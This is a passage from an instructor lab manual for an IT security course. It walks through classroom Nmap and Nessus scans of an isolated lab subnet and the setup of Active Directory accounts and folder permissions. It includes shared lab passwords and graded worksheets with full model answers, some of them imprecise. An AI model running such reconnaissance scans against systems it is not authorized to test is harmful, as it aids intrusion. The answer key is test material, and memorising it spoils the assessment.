scan using Nessus by first defining how to create a Policy Definition to perform the targeted vulnerability assessment scan. Hands-on Lab #2 Instructor Steps: The following presents the steps needed to perform this vulnerability assessment scan on the targeted IP subnetwork and VM server farm: 1. Connect the instructor-removable hard drive to your workstation 2. Boot up the Instructor VM and Microsoft DHCP VM server to allocate an IP host address 3. Enable your DOS command prompt and type ipconfig and ping your allocated IP host address 172.30.0.__ , the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1 4. Login to your Instructor VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch Login ID: instructor or student (case sensitive) Password: ISS316Security (case sensitive) NOTE: If the workstations in your physical classroom have only 2GB of RAM then only two VMs can be powered-on at once. You have to split the VM server farm into 2 physical workstations, loading 2 VM servers in each (WindowsDHCP01 and TargetWindows01) and (TargetUbuntu01 and TargetUbuntu02) to maximize performance. Run ZenMap GUI (Nmap) and Perform an IP Discovery and IP Host Scan 1. Click and enable ZenMap GUI from the Instructor VM desktop Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -25- IT255 Instructor Lab Manual LABORATORY 2. Insert the target IP subnetwork number of 172.30.0.0/24 into the Nmap Target IP address field (Refer to Figure 3 below) 3. Select Intense Scan from the drop-down menu to the right of the Target IP address field (Refer to Figure 3 below) Figure 3 ZenGUI Nmap Target IP Address & Intense Scan Dropdown Menu 4. Click on Start Scan to perform the Intense Scan on the Targeted IP subnetwork 5. The instructor will run the Intense Scan while projecting the real-time results of the tests on the overhead projector for the students to see and ask questions 6. Upon completion of the Intense Scan using ZenMap GUI (Nmap) as a reconnaissance and probing tool, the instructor will review the output created by the Nmap scan Run Nessus and Perform a Vulnerability Assessment Scan 1. Load the Nessus v4.2.2.2 Server Manager on the Instructor VM 2. Connect to the Nessus v4.2.2.2 Server Manager via an HTTPS:// secured browser connection as follows: https:// [IP host address]:8834/ in the navigation bar (at your Instructor VM DOS prompt, type ipconfig to display your IP host address 3. Login to the NessusServer Manager via your secure browser connection and authenticate Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -26- IT255 Instructor Lab Manual LABORATORY Figure 4 Nessus Server Manager v4.2.2.2 4. From the Policies menu toolbar, select Lab 4 (dont worry about the #4) and Import into your Nessus Server Manager. If there is no Lab 4 policy definition click on Policies and create a new IT255 Lab 2 Policy definition as follows: a. Click on Policies +Add b. Create a New Policy Definition: IT255 Lab 2 Policy c. Select all the Default Values in the IT255 Lab 2 Policy Definition d. Save the IT255 Lab 2 Policy Definition Using the Default Values 5. After loading a policy, you can create a new scan by clicking on the Scans option on the menu bar at the top and then click on the + Add button on the right. The Add Scan screen will be displayed as follows: Figure 5 Nessus Server Manager Add Policy Menu Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -27- IT255 Instructor Lab Manual LABORATORY 6. There are five fields to enter the scan target: o Name Sets the name that will be displayed in the Nessus UI to identify the scan. Add Name: IT255 Lab #2 Server Farm Scan o Type Choose between Run Now (immediately execute the scan after submitting) or Template (save as a template for repeat scanning). Choose: Run Now o Policy Select a previously created policy that the scan will use to set parameters controlling Nessus server scanning behavior. Choose: IT255 Lab 2 Policy o Scan Targets Targets can be entered by single IP address (e.g., 192.168.0.1), IP range (e.g., 192.168.0.1-192.168.0.255), subnet with CIDR notation (e.g., 192.168.0.0/24) or resolvable host (e.g., www.nessus.org). Insert: X.X.X.X X.X.X.X or X.X.X.X/24. Enter the IP subnetwork number of the ASA_Instructor VLAN where the server farm resides: 172.30.0.0/24. o Targets File A text file with a list of hosts can be imported by clicking on Browse and selecting a file from the local machine. Example host file formats and individual hosts: 192.168.0.100, 192.168.0.101, 192.168.0.102 Host range: 192.168.0.100-192.168.0.102 Host CIDR block: 192.168.0.1/24 7. After you have entered the scan information, click on Submit. After submitting, the scan will begin immediately before the display is returned to the general Scans page. Figure 6 Nessus Server Manager Scans Page Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -28- IT255 Instructor Lab Manual LABORATORY 8. Once a scan has launched, the Scans list will display a list of all scans currently running or paused along with basic information about the scan. After selecting a particular scan on the list, the action buttons on the top right allow you to Browse the results of the scan in progress, Pause and Resume the scan or Stop the scan completely. 9. When a scan has completed, it will be removed from the Scans list and be available for review on the Reports tab. 10. Clicking on the Reports tab on the menu bar at the top of the interface will bring up the list of running and completed scans. The Reports screen acts as a central point for viewing, comparing, uploading and downloading scan results. Figure 7 Nessus Server Manager Reports Page 11. To browse the results of a scan, select a name from the Reports list and click on Browse. This allows you to view results by navigating through hosts, ports and then specific vulnerabilities. The first summary screen shows each host scanned along with a breakdown of vulnerabilities and open ports: Figure 8 Nessus Server Manager Reports Page Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -29- IT255 Instructor Lab Manual LABORATORY 12. With a host selected, port number will segregate the report and display associated information such as the protocol and service name, as well as a summary of vulnerabilities categorized by risk severity. As you navigate through the scan results, the user interface will maintain the list of hosts as well as a series of clickable arrows to assist in quick navigation to a specific component of the report: Figure 9 Nessus Server Manager Host Scan Report Results 13. Selecting a port will display all of the vulnerability findings associated with the port and service. In the example below, we see that host 192.168.0.10 has 13 vulnerabilities associated with TCP port 445 (CIFS or Common Internet File System). The summary of findings displays the Nessus Plugin ID, vulnerability name, port, protocol and severity. Figure 10 Nessus Server Manager Host Scan Vulnerability Findings Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -30- IT255 Instructor Lab Manual LABORATORY By clicking once on any column heading, the results can be sorted by the columns content. Clicking a second time will reverse sort the results: Figure 11 Nessus Server Manager Host Scan Sorted Vulnerability Findings 14. Selecting a vulnerability from the list will display all details of the finding including a technical description, references, solution, detailed risk factor and any relevant output demonstrating the finding: Figure IN3 Nessus Server Manager Vulnerability Details Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -31- IT255 Instructor Lab Manual LABORATORY 15. Capture your scan report and save your scan report in softcopy in HTML format (click on the pull-down menu and select) 16. Close your Nessus Server Manager and Nessus Client session 17. Answer the Lab #2 Lab Assessment Questions & Answers Hands-on Lab #2 Student Steps: The following presents the steps needed to perform this vulnerability assessment scan on the targeted IP subnetwork and VM server farm: 1. Connect your student removable hard drive to your workstation 2. Boot up the Student VM and Microsoft DHCP VM server to allocate an IP host address 3. Enable your DOS command prompt and type ipconfig and ping your allocated IP host address 172.30.0.__ , the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1 4. Login to your Instructor VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch NOTE: If the workstations in your physical classroom have only 2GB of RAM then only two VMs can be powered-on at once. For this lab, all you need to power-up is the Student VM workstation. Run ZenMap GUI (Nmap) and Perform an IP Discovery and IP Host Scan 1. Click and enable ZenMap GUI from the Instructor VM desktop 2. Insert the target IP subnetwork number of 172.30.0.0/24 into the Nmap Target IP address field (Refer to Figure 18) 3. Select Intense Scan from the drop-down menu to the right of the Target IP address field (Refer to Figure 18) Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -32- IT255 Instructor Lab Manual LABORATORY Figure 3 ZenGUI Nmap Target IP Address & Intense Scan Dropdown Menu 4. Click on Start Scan to perform the Intense Scan on the Targeted IP subnetwork 5. The instructor will run the Intense Scan while projecting the real-time results of the tests on the overhead projector for the students to see and ask questions 6. Upon completion of the Intense Scan using ZenMap GUI (Nmap) as a reconnaissance and probing tool, the instructor will review the output created by the Nmap scan Run Nessus and Perform a Vulnerability Assessment Scan 1. Load the Nessus v4.2.2.2 Server Manager on the Instructor VM 2. Connect to the Nessus v4.2.2.2 Server Manager via an HTTPS:// secured browser connection as follows: https:// [IP host address]:8834/ in the navigation bar (at your Instructor VM DOS prompt, type ipconfig to display your IP host address 3. Login to the Nessus Server Manager via your secure browser connection and authenticate Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -33- IT255 Instructor Lab Manual LABORATORY Figure 4 Nessus Server Manager v4.2.2.2 4. From the Policies menu toolbar, select Lab 4 and Import into your Nessus Server Manager. If there is no Lab 4 policy definition click on Policies and create a new IT255 Lab 2 Policy definition as follows: a. Click on Policies +Add b. Create a New Policy Definition: IT255 Lab 2 Policy c. Select all the Default Values in the IT255 Lab 2 Policy Definition d. Save the IT255 Lab 2 Policy Definition Using the Default Values 5. After loading a policy, you can create a new scan by clicking on the Scans option on the menu bar at the top and then click on the + Add button on the right. The Add Scan screen will be displayed as follows: Figure 5 Nessus Server Manager Add Policy Menu Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -34- IT255 Instructor Lab Manual LABORATORY 6. There are five fields to enter the scan target: o Name Sets the name that will be displayed in the Nessus UI to identify the scan. Add Name: IT255 Lab #2 Server Farm Scan o Type Choose between Run Now (immediately execute the scan after submitting) or Template (save as a template for repeat scanning). Choose: Run Now o Policy Select a previously created policy that the scan will use to set parameters controlling Nessus server scanning behavior. Choose: IT255 Lab 2 Policy o Scan Targets Targets can be entered by single IP address (e.g., 192.168.0.1), IP range (e.g., 192.168.0.1-192.168.0.255), subnet with CIDR notation (e.g., 192.168.0.0/24) or resolvable host (e.g., www.nessus.org). Insert: X.X.X.X X.X.X.X or X.X.X.X/24. Enter the IP subnetwork number of the ASA_Instructor VLAN where the server farm resides: 172.30.0.0/24. o Targets File A text file with a list of hosts can be imported by clicking on Browse and selecting a file from the local machine. Example host file formats and individual hosts: 192.168.0.100, 192.168.0.101, 192.168.0.102 Host range: 192.168.0.100-192.168.0.102 Host CIDR block: 192.168.0.1/24 7. After you have entered the scan information, click on Submit. After submitting, the scan will begin immediately before the display is returned to the general Scans page. Figure 6 Nessus Server Manager Scans Page Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -35- IT255 Instructor Lab Manual LABORATORY 8. Once a scan has launched, the Scans list will display a list of all scans currently running or paused along with basic information about the scan. After selecting a particular scan on the list, the action buttons on the top right allow you to Browse the results of the scan in progress, Pause and Resume the scan or Stop the scan completely. 9. When a scan has completed, it will be removed from the Scans list and be available for review on the Reports tab. 10. Clicking on the Reports tab on the menu bar at the top of the interface will bring up the list of running and completed scans. The Reports screen acts as a central point for viewing, comparing, uploading and downloading scan results. Figure 7 Nessus Server Manager Reports Page 11. To browse the results of a scan, select a name from the Reports list and click on Browse. This allows you to view results by navigating through hosts, ports and then specific vulnerabilities. The first summary screen shows each host scanned along with a breakdown of vulnerabilities and open ports: Figure 8 Nessus Server Manager Reports Page Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -36- IT255 Instructor Lab Manual LABORATORY 12. With a host selected, port number will segregate the report and display associated information such as the protocol and service name, as well as a summary of vulnerabilities categorized by risk severity. As you navigate through the scan results, the user interface will maintain the list of hosts as well as a series of clickable arrows to assist in quick navigation to a specific component of the report: Figure 9 Nessus Server Manager Host Scan Report Results 13. Selecting a port will display all of the vulnerability findings associated with the port and service. In the example below, we see that host 192.168.0.10 has 13 vulnerabilities associated with TCP port 445 (CIFS or Common Internet File System). The summary of findings displays the Nessus Plugin ID, vulnerability name, port, protocol and severity. Figure 10 Nessus Server Manager Host Scan Vulnerability Findings Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -37- IT255 Instructor Lab Manual LABORATORY By clicking once on any column heading, the results can be sorted by the columns content. Clicking a second time will reverse sort the results: Figure 11 Nessus Server Manager Host Scan Sorted Vulnerability Findings 14. Selecting a vulnerability from the list will display full details of the finding including a technical description, references, solution, detailed risk factor and any relevant output demonstrating the finding: Deliverables Upon completion of the vulnerability assessment and scanning lab, students are required to submit the following deliverables: 1. Lab #2 ZenMap GUI scan report in softcopy with annotated notes on what was found 2. Lab #2 Nessus vulnerability scan report in HTML soft copy 3. Lab #2 Lab Assessment Questions and Answers Evaluation Criteria and Rubrics The following are the evaluation criteria and rubrics for Lab #2 that the students must perform: 1. Was the student able to identify risks, threats, and vulnerabilities in an IP network infrastructure using ZenMap GUI (Nmap) to perform an IP host, port, and services scan? [20%] 2. Was the student able to perform a vulnerability assessment scan on a targeted IP subnetwork using Nessus? [20%] Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -38- IT255 Instructor Lab Manual LABORATORY 3. Was the student able to compare the results of the ZenMap GUI Intense Scan with a Nessus vulnerability assessment scan and make a distinction? [20%] 4. Was the student able to assess the findings of the vulnerability assessment scan and identify critical vulnerabilities? [20%] 5. Was the student able to make recommendations for mitigating the identified risks, threats, and vulnerabilities as described by the CVE listing for the found vulnerabilities? [20%] Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -39- IT255 Instructor Lab Manual LABORATORY Lab #2 Assessment Worksheet Perform a Vulnerability Assessment Scan Using Nessus Course Name & Number: ______________________________________________________________ Student Name: _______________________________________________________________________ Instructor Name: _____________________________________________________________________ LAB Due Date: _______________________________________________________________________ Overview This lab demonstrates the first 3 steps in the hacking process that is typically performed when conducting ethical hacking or penetration testing. The first step in the hacking process is to perform an IP host discovery and port/services scan (Step 1: Reconnaissance & Probing) on a targeted IP subnetwork using ZenMap GUI (Nmap) security scanning software. The second step in the hacking process is to perform a vulnerability assessment scan (Step 2: Scanning) on the targeted IP subnetwork using Nessus vulnerability assessment scanning software. Finally, the third step in the hacking process (Step 3: Enumeration) is to identify information pertinent to the vulnerabilities found in order to exploit the vulnerability. Lab Assessment Questions & Answers 1. What is the application ZenMap GUI typically used for? Describe a scenario in which you would use this type of application. Used for port scanning and passive OS fingerprinting. It can be used in an organization to quickly identify hosts on a particular section of the network or identify what services are running on a particular host when it is unknown or there is no local access to the system. ZenMap GUI (Nmap) is typically used during Step #1 of the hacking process: Reconnaissance & Probing. 2. What is the relationship between risks, threats and vulnerabilities as it pertains to Information Systems Security throughout the seven domains of a typical IT infrastructure? Without threats or vulnerabilities you have a very low risk of having an incident. The more likely a threat can exploit any particular vulnerability the higher the risk becomes. Risk mitigation must include finding and eliminating known vulnerabilities and exploits. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -40- IT255 Instructor Lab Manual LABORATORY 3. Which application is used for Step #2 in the hacking process to perform a vulnerability assessment scan? Nessus is a vulnerability assessment scanner that can be downloaded for HOME and educational use but also can be licensed for corporate, enterprise features and functions. 4. Before you conduct an ethical hacking process or penetration test on a live production network, what must you do prior to performing the reconnaissance and probing and scanning procedures? Written permission! You must obtain written authorization to perform an intrusive, penetration test or vulnerability assessment scan on a live production network. 5. What is a CVE listing? Who hosts and who sponsors the CVE database listing website? CVE stands for Common Vulnerabilities and Exposures. The Mitre Corporation under contract with the Department of Homeland Security (sponsor) and the U.S. National Cyber Security Division (sponsor) is responsible for hosting the CVE database listing website. CVE publishes known software vulnerabilities and exposures and how to mitigate them with software patches and updates. 6. Can ZenMap GUI detect what operating systems are present on IP servers and workstations? What would that option look like in the command line if running a scan on 172.30.0.10? Yes, ZenMap GUI can perform OS finger printing scans. The O command enables OS finger printing for OS detection. In ZenMap GUI you can select the Intense Scan option which includes the OS finger printing scan. 7. If you have scanned a live host and detected that it is running Windows XP workstation OS, how would you use this information for performing a Nessus vulnerability assessment scan? You can limit and specify the Nessus vulnerability assessment scan to include Microsoft Windows vulnerabilities only as part of the scan. 8. Once a vulnerability is identified by Nessus, where can you check for more information regarding the identified vulnerability, exploits, and the risk mitigation solution? The CVE database listing website at http://cve.mitre.org/. 9. What is the major different between ZenMap GUI and Nessus? ZenMap GUI is used to perform an initial IP host discovery and port/services scan. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -41- IT255 Instructor Lab Manual LABORATORY Nessus is used to perform a vulnerability assessment of the software (OS, application, etc.) loaded in servers and workstation. Any know vulnerabilities or bugs will be flagged and identified by Nessus. 10. Why do you need to run both ZenMap GUI and Nessus to perform the first 3 steps of the hacking process? ZenMap GUI and Nessus are used to perform different tasks and steps in the hacking process including IP host discovery, port/services scan, and a full-blown vulnerability assessment scan. This covers the first 3 steps of the hacking process. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -42- IT255 Instructor Lab Manual LABORATORY Laboratory #3 Lab #3: Enable Windows Active Directory and User Access Controls Learning Objectives and Outcomes Upon completing this lab, students will be able to complete the following tasks: Design a Windows Active Directory and User access control framework Create a new Windows Active Directory domain controller Evaluate existing user and group permission rights in Active Directory user accounts and their workstations Create new Windows Active Directory users and groups with custom permission rights Create and verify access control lists to protect objects and folders from unauthorized access Required Setup and Tools This lab does not require the use of the ISS Mock IT Infrastructure - Cisco core backbone network. In addition, the Instructor VM workstation and Student VM workstations should be physically disconnected from the ITT internal network and be isolated on a dedicated layer 2 switch. This will allow for a shared DHCP server to be used to allocate the IP addresses for the instructor and student workstations. The following are required for this hands-on lab: A) A classroom workstation (with at least 2 Gig RAM) capable of supporting an insert-able hard drive or USB hard drive with a pre-configured virtualized server farm. This classroom workstation/server will support the virtualized server farm connected to the ASA_Instructor VLAN B) An instructor workstation (with at least 2 Gig RAM) that shall act as the instructors demonstration LAB workstation. The instructor will display the Instructor workstation on the LCD projector to demonstrate the loading and configuring of the ITT Mock IT Infrastructure and Server Farm with VMware Player C) Students LAB workstations will use a local copy of the ITT Mock IT Infrastructure Server Farm on a local or USB hard drive with VMware Player to run their Student and Target VMs The following summarizes the setup, configuration, and equipment needed to perform Lab #3: 1. A Virtualized Server Farm with the following components: a. Microsoft DHCP server for allocating student IP host addresses b. A Student and/or Instructor VM workstation Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -43- IT255 Instructor Lab Manual LABORATORY 2. Target VMs as described by the Lab: a. WindowsTarget01 Server i. Roles that will be installed: Active Directory Services and DNS Server b. Administrator account access on WindowsTarget01 VM Server Windows Server 2003 Standard Edition 32-bit (VM Name: TargetWindows01) o Computer Name: Windows02 o Three Users Available: administrator, instructor or student (case sensitive) o Password: ISS316Security o IP Address: DHCP o Domain Login: NO c. Administrator account access on the Student VM Workstation 3. Standard ITT onsite student workstation must have the following software applications loaded to perform this lab: a. VMware Player 3.x b. Microsoft Office 2007 or higher for Lab Assessment Questions & Answers Recommended Procedures Instructor Demo Lab#3: The instructor will demonstrate logging on to the WindowsTarget01 server and will create a new Active Directory domain. The instructor will demonstrate how to configure Windows Active Directory users and workstation plug-ins. In addition, the Instructor will show the students how to create user accounts, groups, and configure role-based access permissions and access control lists on objects and folders within the Windows Active Directory system. Hands-on Lab #3 Instructor Steps: The Instructor will perform the following demonstration: 1. Connect the instructor-removable hard drive to your workstation 2. Boot up the Instructor VM and Microsoft DHCP VM server to allocate an IP host address 3. Enable your DOS command prompt and type ipconfig and ping your allocated IP host address 172.30.0.__ , the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1 4. Login to your Instructor VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -44- IT255 Instructor Lab Manual LABORATORY NOTE: If the workstations in your physical classroom have only 2GB of RAM then only two VMs can be powered-on at once. You can power-on 2 VMs at once WindowsDHCP01 and TargetWindows01 to maximize performance or you can load the WindowsDHCP01 VM server in a separate workstation connected to the classroom layer 2 switch. This will provide you with the ability to load the Instructor VM workstation and the TargetWindows01 VM server in the same physical workstation. 5. Login to the WindowsTarget01 VM server as administrator 6. On the WindowsTarget01 VM click Start > Run > and type into the command prompt: dcpromo 7. Answer all the necessary questions to create a New Active Directory Forest enabling DNS and reboot 8. Log into WindowsTarget01 as an administrator of the new domain 9. Create the following global domain user accounts and groups using Active Directory Users and Computers (Start -> Administrative Tools -> Active Directory Users and Computers): a. ShopFloor group b. HumanResources group c. Manager group d. SFuser01 user account (use SFuser01pass for the password) member of ShopFloor group e. SFmanager user account (use SFmanagerpass for the password) member of ShopFloor and Manager groups f. HRuser01 user account (use HRuser01pass for the password) member of HumanResources group g. Manager01 user account (use Manager01pass for the password) member of HumanResources and Manager groups 10. Create four new folders: a. C:\ERPdocuments This folder will contain miscellaneous shared files for the ERP software b. C:\ERPdocuments\HRfiles Folder for shared Human Resources (HR) user files c. C:\ERPdocuments\SFfiles Folder for shared Shop Floor (SF) user files d. C:\ERPdocuments\MGRfiles Folder for shared Manager user files 11. Determine what type of access controls are needed to allow the following actions: a. Allow Shop Floor users to read and write files in C:\ ERPdocuments\SFfiles. b. Allow Human Resources users to read and write files in C:\ ERPdocuments\HRfiles. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -45- IT255 Instructor Lab Manual LABORATORY c. Manager01 users to read and write files in C:\ ERPdocuments\MGRfiles and C:\ ERPdocuments\HRfiles. 12. Perform the following steps to evaluate the effectiveness of your access controls: a. Log in as SFuser01. b. Use notepad to create a new text file, lab1file.txt, in C:\ERPdocuments\SFfiles. c. Attempt to create a new text file, lab1file.txt, in C:\ERPdocuments\HRfiles. d. Log in as HRuser01. e. Use notepad to create a new text file, lab2file.txt, in C:\ERPdocuments\HRfiles. f. Attempt to create a new text file, lab2file.txt, in C:\ERPdocuments\SFfiles. 13. Login as Manager01 and verify that you can read and write files in C:\ERPdocuments\HRfiles and C:\ERPdocuments\MGRfile, but not C:\ERPdocuments\SFfiles. Hands-on Lab #3 Student Steps: To perform this hands-on lab, students are required to perform the following steps: 1. Connect the student-removable hard drive to your workstation. 2. Boot up the Instructor VM and Microsoft DHCP VM server to allocate an IP host address. 3. Enable your DOS command prompt and type ipconfig and ping your allocated IP host address 172.30.0.__ , the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1. 4. Login to your Instructor VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch. NOTE: If the workstations in your physical classroom have only 2GB of RAM then only two VMs can be powered-on at once. You can power-on 2 VMs at once WindowsDHCP01 and TargetWindows01 to maximize performance or you can load the WindowsDHCP01 VM server in a separate workstation connected to the classroom layer 2 switch. This will provide you with the ability to load the Student VM workstation and the TargetWindows01 VM server in the same physical workstation. 5. Login into the WindowsTarget01 VM server as administrator. 6. On the WindowsTarget01 VM click Start > Run > and type into the command prompt: dcpromo 7. Answer all the necessary questions to create a New Active Directory Forest enabling DNS and reboot. 8. Log into WindowsTarget01 as an administrator of the new domain. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -46- IT255 Instructor Lab Manual LABORATORY 9. Create the following global domain user accounts and groups using Active Directory Users and Computers (Start -> Administrative Tools -> Active Directory Users and Computers): a. ShopFloor group b. HumanResources group c. Manager group d. SFuser01 user account (use SFuser01pass for the password) member of ShopFloor group e. SFmanager user account (use SFmanagerpass for the password) member of ShopFloor and Manager groups f. HRuser01 user account (use HRuser01pass for the password) member of HumanResources group g. Manager01 user account (use Manager01pass for the password) member of HumanResources and Manager groups 10. Create four new folders: a. C:\ERPdocuments This folder will contain miscellaneous shared files for the ERP software b. C:\ERPdocuments\HRfiles Folder for shared Human Resources (HR) user files c. C:\ERPdocuments\SFfiles Folder for shared Shop Floor (SF) user files d. C:\ERPdocuments\MGRfiles Folder for shared Manager user files 11. Determine what type of access controls are needed to allow the following actions: a. Allow Shop Floor users to read and write files in C:\ ERPdocuments\SFfiles. b. Allow Human Resources users to read and write files in C:\ ERPdocuments\HRfiles. c. Manager01 users to read and write files in C:\ ERPdocuments\MGRfiles and C:\ ERPdocuments\HRfiles. 12. Perform the following steps to evaluate the effectiveness of your access controls: a. Log in as SFuser01. b. Use notepad to create a new text file, lab1file.txt, in C:\ERPdocuments\SFfiles. c. Attempt to create a new text file, lab1file.txt, in C:\ERPdocuments\HRfiles. d. Log in as HRuser01. e. Use notepad to create a new text file, lab2file.txt, in C:\ERPdocuments\HRfiles. f. Attempt to create a new text file, lab2file.txt, in C:\ERPdocuments\SFfiles. 13. Login as Manager01 and verify that you can read and write files in C:\ERPdocuments\HRfiles and C:\ERPdocuments\MGRfile, but not C:\ERPdocuments\SFfiles. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -47- IT255 Instructor Lab Manual LABORATORY Deliverables Upon completion of Lab #3: Enable Windows Active Directory and User Access Controls, students are required to provide the following deliverables: 1. Lab #3 Text file outlining the Active Directory Tree created 2. Lab #3 Lab Assessment Questions & Answers Evaluation Criteria and Rubrics The following are the evaluation criteria and rubrics for Lab #3 that the students must perform: 1. Was the student able to design a Windows Active Directory and User access control framework? [20%] 2. Was the student able to create a new Windows Active Directory domain controller definition? [20%] 3. Was the student able to evaluate existing user and group permission rights in Active Directory user accounts and their workstations? [20%] 4. Was the student able to create new Windows Active Directory users and groups with custom permission rights for user accounts and folders? [20%] 5. Was the student able to create and verify access control lists to protect objects and folders from unauthorized access? [20%] Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -48- IT255 Instructor Lab Manual LABORATORY Lab #3 Assessment Worksheet Enable Windows Active Directory and User Access Controls Course Name & Number: ______________________________________________________________ Student Name: _______________________________________________________________________ Instructor Name: _____________________________________________________________________ LAB Due Date: _______________________________________________________________________ Overview This lab provides students with the hands-on skills needed to create a new Active Directory domain in Windows Server 2003 and demonstrates how to configure a centralized authentication and policy definition for access controls. The Active Directory users and workstation plug-ins will be used to create users, groups, and configure role-based access permissions and controls on objects and folders in a Windows Server 2003 Active Directory system. Lab Assessment Questions & Answers 1. What are the three fundamental elements of an effective access control solution for information systems? Identification, Authentication and Authorization 2. What two access controls can be setup for a Windows Server 2003 folders and authentication? New Technology File System (NTFS) folder permissions as well as authentication controls through Group Policy Objects (GPO) for controlling access to sensitive data 3. If you can browse a file on a Windows network share but are not able to copy it or modify it what type of access controls and permissions are probably configured? What type of Access Control would best describe this access control situation? Read only access rights This is an example of a Discretionary Access Control or Mandatory Access Control and is typically configured by the data owner Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -49- IT255 Instructor Lab Manual LABORATORY 4. What is the mechanism on a Windows Server where you can administer granular policies and permissions on a Windows network using role-based access? Active Directory with Group Policies 5. What is two-factor authentication and why is it an effective access control technique? Instead of using one type of authentication based upon a known username and password, the user also must provide something local to his locale such as a pin from a token or some biometric input. These two factors will grant the user access and privileges to the environment or InfoSec system. 6. Relate how Windows Server 2008 R2 Active Directory and the configuration of access controls achieve C-I-A for departmental LANs, departmental folders, and data. Windows Server 2008 R2 AD helps organizations implement security policies pertaining to access controls to LAN servers, departmental applications and data based on user profiles and permission rights. Creating user login IDs and passwords with frequent password changes helps achieve confidentiality and integrity of data by keeping unauthorized users out. Defining departmental groups and folders helps delineate and implement user access and permission rights to the data files contained within these groups and folders. This also helps achieve confidentiality and integrity of data. Finally, by defining specific user read/write permissions for specific data files, intra-departmental folders and data files can maintain confidentiality and data integrity by minimizing access to only those individuals who need it within the department. 7. Is it a good practice to include the account or user name in the password? Why or why not? It is not a good practice to include the account name in the password because this would make it easier for attackers to decrypt or guess the password and gain unauthorized access. The following is a best practice for password definitions: never imbed your account name or user name within the password itself. 8. Can a user who is defined in the Active Directory access a shared drive if that user is not part of the domain? Yes, but the System Administrator must first identify what the users access rights and permission rights are prior to granting access to the shared drive, folders, and data files. 9. Does Windows Server 2003 require a users login/password credentials prior to accessing shared drives? Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -50- IT255 Instructor Lab Manual LABORATORY Yes, regardless of the user, Windows Server 2003 requires all login/password credentials for users prior to granting that user access to shared drives. 10. When granting access to LAN systems for GUESTS (i.e., auditors, consultants, third-party individuals, etc.), what security controls do you recommend be implemented in order to maximize CI-A of production systems and data? Require GUEST users to review and sign the organizations Acceptable Use Policy (AUP). If GUEST users will be accessing confidential data of the organization, have the users review and sign a confidentiality agreement prior to granting access to the information. Create a separate GUEST domain which has shared drives, folders, and data files that are accessible only by the GUEST user names that are defined. This can act as a buffer zone for moving, copying, and sharing documents between the organization and the GUEST users. Provide read/write privileges and permission rights to authorized GUEST user names for access to shared GUEST drives, folders, and data files. Prevent GUEST users from seeing other shared drives, folders, and data files. Prevent unauthorized access and potential C-I-A breaches to systems, applications, and data. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -51- IT255 Instructor Lab Manual LABORATORY Laboratory #4 Lab #4: Configure Group Policy Objects and Microsoft Baseline Security Analyzer (MBSA) Learning Objectives and Outcomes Upon the completion of this lab, the students will be able to conduct the following tasks: Define Active Directory Group Policy Objects (GPO) in Windows 2003 Server Deploy GPOs to domain workstations within Windows 2003 Server Configure login credentials and specify password requirements and parameters for domain workstations within Windows 2003 Server Use Microsoft Baseline Security Analyzer (MBSA) to security baseline a Windows 2003 Server and Windows XP Professional Workstation Enable automatic and online security updating and patching from Microsofts web servers via the Internet for Windows 2003 Server and Windows XP Professional Workstation Required Setup and Tools This lab does not require the use of the ISS Mock IT Infrastructure - Cisco core backbone network. In addition, the Instructor VM workstation and Student VM workstations should be physically disconnected from the ITT internal network and be isolated on a dedicated layer 